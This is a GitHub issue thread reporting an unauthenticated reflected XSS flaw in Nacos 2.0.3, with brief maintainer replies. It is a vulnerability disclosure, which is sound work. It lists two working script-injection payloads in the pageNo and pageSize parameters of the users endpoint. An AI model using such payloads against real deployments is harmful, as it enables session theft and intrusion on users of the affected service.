### ISSUE TITLE
This is  XSS vulnerabilities

### ISSUE THREAD

**Issue by Du9r1** [alibaba/nacos#7359]
Nacos has xss vulnerability

Trigger condition: no verification required

version: Nacos 2.0.3

payload1:`/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script>`
payload2:`/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1`

![image](https://user-images.githubusercontent.com/95545320/144721786-8d395d45-3e32-4280-a2db-3693994188ab.png)
![image](https://user-images.githubusercontent.com/95545320/144722442-85f6b25c-4493-42d2-aae9-4284ad2148e9.png)

**Comment by onewe** [comment]
@onewe will solve it@

**Comment by KomachiSion** [comment]
duplicate with #7359
